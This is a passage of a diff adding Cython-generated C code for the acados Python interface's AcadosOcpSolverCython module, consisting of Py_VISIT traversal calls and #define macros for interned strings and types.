Py_VISIT(traverse_module_state->__pyx_tuple__65); + Py_VISIT(traverse_module_state->__pyx_tuple__67); + Py_VISIT(traverse_module_state->__pyx_tuple__69); + Py_VISIT(traverse_module_state->__pyx_tuple__71); + Py_VISIT(traverse_module_state->__pyx_tuple__72); + Py_VISIT(traverse_module_state->__pyx_tuple__74); + Py_VISIT(traverse_module_state->__pyx_tuple__77); + Py_VISIT(traverse_module_state->__pyx_tuple__79); + Py_VISIT(traverse_module_state->__pyx_tuple__82); + Py_VISIT(traverse_module_state->__pyx_codeobj__40); + Py_VISIT(traverse_module_state->__pyx_codeobj__42); + Py_VISIT(traverse_module_state->__pyx_codeobj__43); + Py_VISIT(traverse_module_state->__pyx_codeobj__44); + Py_VISIT(traverse_module_state->__pyx_codeobj__46); + Py_VISIT(traverse_module_state->__pyx_codeobj__48); + Py_VISIT(traverse_module_state->__pyx_codeobj__50); + Py_VISIT(traverse_module_state->__pyx_codeobj__53); + Py_VISIT(traverse_module_state->__pyx_codeobj__54); + Py_VISIT(traverse_module_state->__pyx_codeobj__56); + Py_VISIT(traverse_module_state->__pyx_codeobj__59); + Py_VISIT(traverse_module_state->__pyx_codeobj__61); + Py_VISIT(traverse_module_state->__pyx_codeobj__63); + Py_VISIT(traverse_module_state->__pyx_codeobj__64); + Py_VISIT(traverse_module_state->__pyx_codeobj__66); + Py_VISIT(traverse_module_state->__pyx_codeobj__68); + Py_VISIT(traverse_module_state->__pyx_codeobj__70); + Py_VISIT(traverse_module_state->__pyx_codeobj__73); + Py_VISIT(traverse_module_state->__pyx_codeobj__75); + Py_VISIT(traverse_module_state->__pyx_codeobj__76); + Py_VISIT(traverse_module_state->__pyx_codeobj__78); + Py_VISIT(traverse_module_state->__pyx_codeobj__80); + Py_VISIT(traverse_module_state->__pyx_codeobj__81); + Py_VISIT(traverse_module_state->__pyx_codeobj__83); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_7cpython_4type_type __pyx_mstate_global->__pyx_ptype_7cpython_4type_type +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_5numpy_dtype __pyx_mstate_global->__pyx_ptype_5numpy_dtype +#define __pyx_ptype_5numpy_flatiter __pyx_mstate_global->__pyx_ptype_5numpy_flatiter +#define __pyx_ptype_5numpy_broadcast __pyx_mstate_global->__pyx_ptype_5numpy_broadcast +#define __pyx_ptype_5numpy_ndarray __pyx_mstate_global->__pyx_ptype_5numpy_ndarray +#define __pyx_ptype_5numpy_generic __pyx_mstate_global->__pyx_ptype_5numpy_generic +#define __pyx_ptype_5numpy_number __pyx_mstate_global->__pyx_ptype_5numpy_number +#define __pyx_ptype_5numpy_integer __pyx_mstate_global->__pyx_ptype_5numpy_integer +#define __pyx_ptype_5numpy_signedinteger __pyx_mstate_global->__pyx_ptype_5numpy_signedinteger +#define __pyx_ptype_5numpy_unsignedinteger __pyx_mstate_global->__pyx_ptype_5numpy_unsignedinteger +#define __pyx_ptype_5numpy_inexact __pyx_mstate_global->__pyx_ptype_5numpy_inexact +#define __pyx_ptype_5numpy_floating __pyx_mstate_global->__pyx_ptype_5numpy_floating +#define __pyx_ptype_5numpy_complexfloating __pyx_mstate_global->__pyx_ptype_5numpy_complexfloating +#define __pyx_ptype_5numpy_flexible __pyx_mstate_global->__pyx_ptype_5numpy_flexible +#define __pyx_ptype_5numpy_character __pyx_mstate_global->__pyx_ptype_5numpy_character +#define __pyx_ptype_5numpy_ufunc __pyx_mstate_global->__pyx_ptype_5numpy_ufunc +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython __pyx_mstate_global->__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython +#define __pyx_type___pyx_array __pyx_mstate_global->__pyx_type___pyx_array +#define __pyx_type___pyx_MemviewEnum __pyx_mstate_global->__pyx_type___pyx_MemviewEnum +#define __pyx_type___pyx_memoryview __pyx_mstate_global->__pyx_type___pyx_memoryview +#define __pyx_type___pyx_memoryviewslice __pyx_mstate_global->__pyx_type___pyx_memoryviewslice +#endif +#define __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython __pyx_mstate_global->__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython +#define __pyx_array_type __pyx_mstate_global->__pyx_array_type +#define __pyx_MemviewEnum_type __pyx_mstate_global->__pyx_MemviewEnum_type +#define __pyx_memoryview_type __pyx_mstate_global->__pyx_memoryview_type +#define __pyx_memoryviewslice_type __pyx_mstate_global->__pyx_memoryviewslice_type +#define __pyx_kp_u_ __pyx_mstate_global->__pyx_kp_u_ +#define __pyx_n_s_ASCII __pyx_mstate_global->__pyx_n_s_ASCII +#define __pyx_n_s_AcadosOcpSolverCython __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython +#define __pyx_n_s_AcadosOcpSolverCython___get_poin __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___get_poin +#define __pyx_n_s_AcadosOcpSolverCython___get_stat __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___get_stat +#define __pyx_n_s_AcadosOcpSolverCython___get_stat_2 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___get_stat_2 +#define __pyx_n_s_AcadosOcpSolverCython___get_stat_3 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___get_stat_3 +#define __pyx_n_s_AcadosOcpSolverCython___reduce_c __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___reduce_c +#define __pyx_n_s_AcadosOcpSolverCython___setstate __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___setstate +#define __pyx_n_s_AcadosOcpSolverCython__get_poin __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython__get_poin +#define __pyx_n_s_AcadosOcpSolverCython__get_stat __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython__get_stat +#define __pyx_n_s_AcadosOcpSolverCython__get_stat_2 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython__get_stat_2 +#define __pyx_n_s_AcadosOcpSolverCython__get_stat_3 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython__get_stat_3 +#define __pyx_kp_u_AcadosOcpSolverCython_constraint __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_constraint +#define __pyx_n_s_AcadosOcpSolverCython_constraint_2 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_constraint_2 +#define __pyx_n_s_AcadosOcpSolverCython_cost_set __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_cost_set +#define __pyx_kp_u_AcadosOcpSolverCython_cost_set_m __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_cost_set_m +#define __pyx_kp_u_AcadosOcpSolverCython_does_not_s __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_does_not_s +#define __pyx_kp_u_AcadosOcpSolverCython_does_not_s_2 __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2 +#define __pyx_n_s_AcadosOcpSolverCython_dynamics_g __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_dynamics_g +#define __pyx_kp_u_AcadosOcpSolverCython_eval_param __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_eval_param +#define __pyx_kp_u_AcadosOcpSolverCython_eval_param_2 __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_eval_param_2 +#define __pyx_n_s_AcadosOcpSolverCython_eval_param_3 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_eval_param_3 +#define __pyx_n_s_AcadosOcpSolverCython_get __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_get +#define __pyx_n_s_AcadosOcpSolverCython_get_cost __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_get_cost +#define __pyx_kp_u_AcadosOcpSolverCython_get_field __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_get_field +#define __pyx_kp_u_AcadosOcpSolverCython_get_is_an __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_get_is_an +#define __pyx_n_s_AcadosOcpSolverCython_get_residu __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_get_residu +#define __pyx_kp_u_AcadosOcpSolverCython_get_stage __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_get_stage +#define __pyx_n_s_AcadosOcpSolverCython_get_stats __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_get_stats +#define __pyx_n_s_AcadosOcpSolverCython_load_itera __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_load_itera +#define __pyx_kp_u_AcadosOcpSolverCython_options_se __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_options_se +#define __pyx_n_s_AcadosOcpSolverCython_options_se_2 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_options_se_2 +#define __pyx_n_s_AcadosOcpSolverCython_print_stat __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_print_stat +#define __pyx_n_s_AcadosOcpSolverCython_reset __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_reset +#define __pyx_n_s_AcadosOcpSolverCython_set __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_set +#define __pyx_kp_u_AcadosOcpSolverCython_set_is_not __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_set_is_not +#define __pyx_kp_u_AcadosOcpSolverCython_set_mismat __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_set_mismat +#define __pyx_n_s_AcadosOcpSolverCython_set_new_ti __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_set_new_ti +#define __pyx_n_s_AcadosOcpSolverCython_solve __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_solve +#define __pyx_kp_u_AcadosOcpSolverCython_solve_argu __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_solve_argu +#define __pyx_kp_u_AcadosOcpSolverCython_solve_argu_2 __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2 +#define __pyx_n_s_AcadosOcpSolverCython_store_iter __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_store_iter +#define __pyx_n_s_AcadosOcpSolverCython_update_qp __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_update_qp +#define __pyx_kp_s_All_dimensions_preceding_dimensi __pyx_mstate_global->__pyx_kp_s_All_dimensions_preceding_dimensi +#define __pyx_n_s_AssertionError __pyx_mstate_global->__pyx_n_s_AssertionError +#define __pyx_kp_s_Buffer_view_does_not_expose_stri __pyx_mstate_global->__pyx_kp_s_Buffer_view_does_not_expose_stri +#define __pyx_kp_s_Can_only_create_a_buffer_that_is __pyx_mstate_global->__pyx_kp_s_Can_only_create_a_buffer_that_is +#define __pyx_kp_s_Cannot_assign_to_read_only_memor __pyx_mstate_global->__pyx_kp_s_Cannot_assign_to_read_only_memor +#define __pyx_kp_s_Cannot_create_writable_memory_vi __pyx_mstate_global->__pyx_kp_s_Cannot_create_writable_memory_vi +#define __pyx_kp_u_Cannot_index_with_type __pyx_mstate_global->__pyx_kp_u_Cannot_index_with_type +#define __pyx_kp_s_Cannot_transpose_memoryview_with __pyx_mstate_global->__pyx_kp_s_Cannot_transpose_memoryview_with +#define __pyx_kp_s_Dimension_d_is_not_direct __pyx_mstate_global->__pyx_kp_s_Dimension_d_is_not_direct +#define __pyx_n_s_Ellipsis __pyx_mstate_global->__pyx_n_s_Ellipsis +#define __pyx_kp_s_Empty_shape_tuple_for_cython_arr __pyx_mstate_global->__pyx_kp_s_Empty_shape_tuple_for_cython_arr +#define __pyx_n_u_F __pyx_mstate_global->__pyx_n_u_F +#define __pyx_n_s_ImportError __pyx_mstate_global->__pyx_n_s_ImportError +#define __pyx_kp_s_Incompatible_checksums_0x_x_vs_0 __pyx_mstate_global->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0 +#define __pyx_n_s_IndexError __pyx_mstate_global->__pyx_n_s_IndexError +#define __pyx_kp_s_Index_out_of_bounds_axis_d __pyx_mstate_global->__pyx_kp_s_Index_out_of_bounds_axis_d +#define __pyx_kp_s_Indirect_dimensions_not_supporte __pyx_mstate_global->__pyx_kp_s_Indirect_dimensions_not_supporte +#define __pyx_kp_u_Invalid_mode_expected_c_or_fortr __pyx_mstate_global->__pyx_kp_u_Invalid_mode_expected_c_or_fortr +#define __pyx_kp_u_Invalid_shape_in_axis __pyx_mstate_global->__pyx_kp_u_Invalid_shape_in_axis +#define __pyx_n_s_MemoryError __pyx_mstate_global->__pyx_n_s_MemoryError +#define __pyx_kp_s_MemoryView_of_r_at_0x_x __pyx_mstate_global->__pyx_kp_s_MemoryView_of_r_at_0x_x +#define __pyx_kp_s_MemoryView_of_r_object __pyx_mstate_global->__pyx_kp_s_MemoryView_of_r_object +#define __pyx_n_s_N __pyx_mstate_global->__pyx_n_s_N +#define __pyx_kp_u_None __pyx_mstate_global->__pyx_kp_u_None +#define __pyx_n_s_NotImplementedError __pyx_mstate_global->__pyx_n_s_NotImplementedError +#define __pyx_n_b_O __pyx_mstate_global->__pyx_n_b_O +#define __pyx_kp_u_Out_of_bounds_on_buffer_access_a __pyx_mstate_global->__pyx_kp_u_Out_of_bounds_on_buffer_access_a +#define __pyx_n_s_PickleError __pyx_mstate_global->__pyx_n_s_PickleError +#define __pyx_n_u_SQP __pyx_mstate_global->__pyx_n_u_SQP +#define __pyx_n_u_SQP_RTI __pyx_mstate_global->__pyx_n_u_SQP_RTI +#define __pyx_n_s_Sequence __pyx_mstate_global->__pyx_n_s_Sequence +#define __pyx_kp_s_Step_may_not_be_zero_axis_d __pyx_mstate_global->__pyx_kp_s_Step_may_not_be_zero_axis_d +#define __pyx_kp_u_TODO __pyx_mstate_global->__pyx_kp_u_TODO +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_kp_s_Unable_to_convert_item_to_object __pyx_mstate_global->__pyx_kp_s_Unable_to_convert_item_to_object +#define __pyx_n_s_ValueError __pyx_mstate_global->__pyx_n_s_ValueError +#define __pyx_n_s_View_MemoryView __pyx_mstate_global->__pyx_n_s_View_MemoryView +#define __pyx_kp_u_Y_m_d_H_M_S_f __pyx_mstate_global->__pyx_kp_u_Y_m_d_H_M_S_f +#define __pyx_kp_u__14 __pyx_mstate_global->__pyx_kp_u__14 +#define __pyx_n_u__15 __pyx_mstate_global->__pyx_n_u__15 +#define __pyx_kp_u__2 __pyx_mstate_global->__pyx_kp_u__2 +#define __pyx_kp_u__29 __pyx_mstate_global->__pyx_kp_u__29 +#define __pyx_n_s__3 __pyx_mstate_global->__pyx_n_s__3 +#define __pyx_kp_u__6 __pyx_mstate_global->__pyx_kp_u__6 +#define __pyx_kp_u__7 __pyx_mstate_global->__pyx_kp_u__7 +#define __pyx_n_s__84 __pyx_mstate_global->__pyx_n_s__84 +#define __pyx_n_s_abc __pyx_mstate_global->__pyx_n_s_abc +#define __pyx_n_s_acados_template_acados_ocp_solve __pyx_mstate_global->__pyx_n_s_acados_template_acados_ocp_solve +#define __pyx_n_s_allocate_buffer __pyx_mstate_global->__pyx_n_s_allocate_buffer +#define __pyx_n_u_alpha __pyx_mstate_global->__pyx_n_u_alpha +#define __pyx_n_u_alpha_min __pyx_mstate_global->__pyx_n_u_alpha_min +#define __pyx_n_u_alpha_reduction __pyx_mstate_global->__pyx_n_u_alpha_reduction +#define __pyx_kp_u_alpha_values_are_not_available_f __pyx_mstate_global->__pyx_kp_u_alpha_values_are_not_available_f +#define __pyx_kp_u_and __pyx_mstate_global->__pyx_kp_u_and +#define __pyx_n_s_array __pyx_mstate_global->__pyx_n_s_array +#define __pyx_n_s_ascontiguousarray __pyx_mstate_global->__pyx_n_s_ascontiguousarray +#define __pyx_n_s_asfortranarray __pyx_mstate_global->__pyx_n_s_asfortranarray +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_kp_u_at_stage __pyx_mstate_global->__pyx_kp_u_at_stage +#define __pyx_n_s_base __pyx_mstate_global->__pyx_n_s_base +#define __pyx_n_s_c __pyx_mstate_global->__pyx_n_s_c +#define __pyx_n_u_c __pyx_mstate_global->__pyx_n_u_c +#define __pyx_n_s_class __pyx_mstate_global->__pyx_n_s_class +#define __pyx_n_s_class_getitem __pyx_mstate_global->__pyx_n_s_class_getitem +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_collections __pyx_mstate_global->__pyx_n_s_collections +#define __pyx_kp_s_collections_abc __pyx_mstate_global->__pyx_kp_s_collections_abc +#define __pyx_n_s_constraints_fields __pyx_mstate_global->__pyx_n_s_constraints_fields +#define __pyx_n_s_constraints_set __pyx_mstate_global->__pyx_n_s_constraints_set +#define __pyx_kp_s_contiguous_and_direct __pyx_mstate_global->__pyx_kp_s_contiguous_and_direct +#define __pyx_kp_s_contiguous_and_indirect __pyx_mstate_global->__pyx_kp_s_contiguous_and_indirect +#define __pyx_n_s_cost_fields __pyx_mstate_global->__pyx_n_s_cost_fields +#define __pyx_n_s_cost_set __pyx_mstate_global->__pyx_n_s_cost_set +#define __pyx_n_s_count __pyx_mstate_global->__pyx_n_s_count +#define __pyx_n_s_datetime __pyx_mstate_global->__pyx_n_s_datetime +#define __pyx_n_s_default __pyx_mstate_global->__pyx_n_s_default +#define __pyx_n_s_dict __pyx_mstate_global->__pyx_n_s_dict +#define __pyx_n_s_dims __pyx_mstate_global->__pyx_n_s_dims +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_n_s_double_fields __pyx_mstate_global->__pyx_n_s_double_fields +#define __pyx_n_s_double_value __pyx_mstate_global->__pyx_n_s_double_value +#define __pyx_n_s_dtype __pyx_mstate_global->__pyx_n_s_dtype +#define __pyx_n_s_dtype_is_object __pyx_mstate_global->__pyx_n_s_dtype_is_object +#define __pyx_n_s_dump __pyx_mstate_global->__pyx_n_s_dump +#define __pyx_n_s_dynamics_get __pyx_mstate_global->__pyx_n_s_dynamics_get +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_encode __pyx_mstate_global->__pyx_n_s_encode +#define __pyx_n_s_enter __pyx_mstate_global->__pyx_n_s_enter +#define __pyx_n_s_enumerate __pyx_mstate_global->__pyx_n_s_enumerate +#define __pyx_n_u_eps_sufficient_descent __pyx_mstate_global->__pyx_n_u_eps_sufficient_descent +#define __pyx_n_s_error __pyx_mstate_global->__pyx_n_s_error +#define __pyx_n_s_eval_param_sens __pyx_mstate_global->__pyx_n_s_eval_param_sens +#define __pyx_n_u_ex __pyx_mstate_global->__pyx_n_u_ex +#define __pyx_n_s_exit __pyx_mstate_global->__pyx_n_s_exit +#define __pyx_n_s_f __pyx_mstate_global->__pyx_n_s_f +#define __pyx_n_s_field __pyx_mstate_global->__pyx_n_s_field +#define __pyx_n_s_field_2 __pyx_mstate_global->__pyx_n_s_field_2 +#define __pyx_n_s_fields __pyx_mstate_global->__pyx_n_s_fields +#define __pyx_n_s_filename __pyx_mstate_global->__pyx_n_s_filename +#define __pyx_n_s_flags __pyx_mstate_global->__pyx_n_s_flags +#define __pyx_n_s_float64 __pyx_mstate_global->__pyx_n_s_float64 +#define __pyx_kp_u_for_field __pyx_mstate_global->__pyx_kp_u_for_field +#define __pyx_n_s_format __pyx_mstate_global->__pyx_n_s_format +#define __pyx_n_s_fortran __pyx_mstate_global->__pyx_n_s_fortran +#define __pyx_n_u_fortran __pyx_mstate_global->__pyx_n_u_fortran +#define __pyx_n_s_full_stats __pyx_mstate_global->__pyx_n_s_full_stats +#define __pyx_n_u_full_step_dual __pyx_mstate_global->__pyx_n_u_full_step_dual +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_get __pyx_mstate_global->__pyx_n_s_get +#define __pyx_n_s_get_cost __pyx_mstate_global->__pyx_n_s_get_cost +#define __pyx_n_s_get_pointers_solver __pyx_mstate_global->__pyx_n_s_get_pointers_solver +#define __pyx_n_s_get_residuals __pyx_mstate_global->__pyx_n_s_get_residuals +#define __pyx_n_s_get_stat_double __pyx_mstate_global->__pyx_n_s_get_stat_double +#define __pyx_n_s_get_stat_int __pyx_mstate_global->__pyx_n_s_get_stat_int +#define __pyx_n_s_get_stat_matrix __pyx_mstate_global->__pyx_n_s_get_stat_matrix +#define __pyx_n_s_get_stats __pyx_mstate_global->__pyx_n_s_get_stats +#define __pyx_n_s_getcwd __pyx_mstate_global->__pyx_n_s_getcwd +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_u_globalization __pyx_mstate_global->__pyx_n_u_globalization +#define __pyx_n_u_globalization_use_SOC __pyx_mstate_global->__pyx_n_u_globalization_use_SOC +#define __pyx_kp_u_got __pyx_mstate_global->__pyx_kp_u_got +#define __pyx_kp_u_got_differing_extents_in_dimensi __pyx_mstate_global->__pyx_kp_u_got_differing_extents_in_dimensi +#define __pyx_n_s_i __pyx_mstate_global->__pyx_n_s_i +#define __pyx_n_s_id __pyx_mstate_global->__pyx_n_s_id +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_n_s_indent __pyx_mstate_global->__pyx_n_s_indent +#define __pyx_n_s_index __pyx_mstate_global->__pyx_n_s_index +#define __pyx_n_u_initialize_t_slacks __pyx_mstate_global->__pyx_n_u_initialize_t_slacks +#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing +#define __pyx_n_s_int __pyx_mstate_global->__pyx_n_s_int +#define __pyx_n_s_int_fields __pyx_mstate_global->__pyx_n_s_int_fields +#define __pyx_n_s_int_value __pyx_mstate_global->__pyx_n_s_int_value +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_isfile __pyx_mstate_global->__pyx_n_s_isfile +#define __pyx_n_s_itemsize __pyx_mstate_global->__pyx_n_s_itemsize +#define __pyx_kp_s_itemsize_0_for_cython_array __pyx_mstate_global->__pyx_kp_s_itemsize_0_for_cython_array +#define __pyx_n_u_iterate __pyx_mstate_global->__pyx_n_u_iterate +#define __pyx_n_s_join __pyx_mstate_global->__pyx_n_s_join +#define __pyx_n_s_json __pyx_mstate_global->__pyx_n_s_json +#define __pyx_kp_u_json_2 __pyx_mstate_global->__pyx_kp_u_json_2 +#define __pyx_n_s_key __pyx_mstate_global->__pyx_n_s_key +#define __pyx_n_s_keys __pyx_mstate_global->__pyx_n_s_keys +#define __pyx_n_u_lam __pyx_mstate_global->__pyx_n_u_lam +#define __pyx_n_u_lam_2 __pyx_mstate_global->__pyx_n_u_lam_2 +#define __pyx_n_u_lbu __pyx_mstate_global->__pyx_n_u_lbu +#define __pyx_n_u_lbx __pyx_mstate_global->__pyx_n_u_lbx +#define __pyx_n_u_line_search_use_sufficient_desce __pyx_mstate_global->__pyx_n_u_line_search_use_sufficient_desce +#define __pyx_n_s_load __pyx_mstate_global->__pyx_n_s_load +#define __pyx_n_s_load_iterate __pyx_mstate_global->__pyx_n_s_load_iterate +#define __pyx_kp_u_load_iterate_failed_file_does_no __pyx_mstate_global->__pyx_kp_u_load_iterate_failed_file_does_no +#define __pyx_n_s_m __pyx_mstate_global->__pyx_n_s_m +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_mem_fields __pyx_mstate_global->__pyx_n_s_mem_fields +#define __pyx_n_s_memview __pyx_mstate_global->__pyx_n_s_memview +#define __pyx_n_s_min_size __pyx_mstate_global->__pyx_n_s_min_size +#define __pyx_n_s_mode __pyx_mstate_global->__pyx_n_s_mode +#define __pyx_n_s_model_name __pyx_mstate_global->__pyx_n_s_model_name +#define __pyx_n_s_msg __pyx_mstate_global->__pyx_n_s_msg +#define __pyx_n_s_n __pyx_mstate_global->__pyx_n_s_n +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_name_2 __pyx_mstate_global->__pyx_n_s_name_2 +#define __pyx_n_s_ndim __pyx_mstate_global->__pyx_n_s_ndim +#define __pyx_n_s_new __pyx_mstate_global->__pyx_n_s_new +#define __pyx_n_s_new_time_steps __pyx_mstate_global->__pyx_n_s_new_time_steps +#define __pyx_n_s_nlp_solver_type __pyx_mstate_global->__pyx_n_s_nlp_solver_type +#define __pyx_kp_s_no_default___reduce___due_to_non __pyx_mstate_global->__pyx_kp_s_no_default___reduce___due_to_non +#define __pyx_n_s_np __pyx_mstate_global->__pyx_n_s_np +#define __pyx_n_s_numpy __pyx_mstate_global->__pyx_n_s_numpy +#define __pyx_kp_u_numpy_core_multiarray_failed_to __pyx_mstate_global->__pyx_kp_u_numpy_core_multiarray_failed_to +#define __pyx_kp_u_numpy_core_umath_failed_to_impor __pyx_mstate_global->__pyx_kp_u_numpy_core_umath_failed_to_impor +#define __pyx_n_s_nx __pyx_mstate_global->__pyx_n_s_nx +#define __pyx_n_s_obj __pyx_mstate_global->__pyx_n_s_obj +#define __pyx_n_s_open __pyx_mstate_global->__pyx_n_s_open +#define __pyx_n_s_options_set __pyx_mstate_global->__pyx_n_s_options_set +#define __pyx_n_s_order __pyx_mstate_global->__pyx_n_s_order +#define __pyx_n_s_os __pyx_mstate_global->__pyx_n_s_os +#define __pyx_n_s_out __pyx_mstate_global->__pyx_n_s_out +#define __pyx_n_s_out_fields __pyx_mstate_global->__pyx_n_s_out_fields +#define __pyx_n_s_out_mat __pyx_mstate_global->__pyx_n_s_out_mat +#define __pyx_n_s_overwrite __pyx_mstate_global->__pyx_n_s_overwrite +#define __pyx_n_u_p __pyx_mstate_global->__pyx_n_u_p +#define __pyx_n_s_pack __pyx_mstate_global->__pyx_n_s_pack +#define __pyx_n_s_path __pyx_mstate_global->__pyx_n_s_path +#define __pyx_n_u_pi __pyx_mstate_global->__pyx_n_u_pi +#define __pyx_n_u_pi_2 __pyx_mstate_global->__pyx_n_u_pi_2 +#define __pyx_n_s_pickle __pyx_mstate_global->__pyx_n_s_pickle +#define __pyx_n_s_print __pyx_mstate_global->__pyx_n_s_print +#define __pyx_n_u_print_level __pyx_mstate_global->__pyx_n_u_print_level +#define __pyx_n_s_print_statistics __pyx_mstate_global->__pyx_n_s_print_statistics +#define __pyx_n_s_pyx_PickleError __pyx_mstate_global->__pyx_n_s_pyx_PickleError +#define __pyx_n_s_pyx_checksum __pyx_mstate_global->__pyx_n_s_pyx_checksum +#define __pyx_n_s_pyx_result __pyx_mstate_global->__pyx_n_s_pyx_result +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_pyx_type __pyx_mstate_global->__pyx_n_s_pyx_type +#define __pyx_n_s_pyx_unpickle_Enum __pyx_mstate_global->__pyx_n_s_pyx_unpickle_Enum +#define __pyx_n_s_pyx_vtable __pyx_mstate_global->__pyx_n_s_pyx_vtable +#define __pyx_n_u_qp_iter __pyx_mstate_global->__pyx_n_u_qp_iter +#define __pyx_n_u_qp_mu0 __pyx_mstate_global->__pyx_n_u_qp_mu0 +#define __pyx_n_s_qp_solver_cond_N __pyx_mstate_global->__pyx_n_s_qp_solver_cond_N +#define __pyx_n_u_qp_tau_min __pyx_mstate_global->__pyx_n_u_qp_tau_min +#define __pyx_n_u_qp_tol_comp __pyx_mstate_global->__pyx_n_u_qp_tol_comp +#define __pyx_n_u_qp_tol_eq __pyx_mstate_global->__pyx_n_u_qp_tol_eq +#define __pyx_n_u_qp_tol_ineq __pyx_mstate_global->__pyx_n_u_qp_tol_ineq +#define __pyx_n_u_qp_tol_stat __pyx_mstate_global->__pyx_n_u_qp_tol_stat +#define __pyx_n_u_qp_warm_start 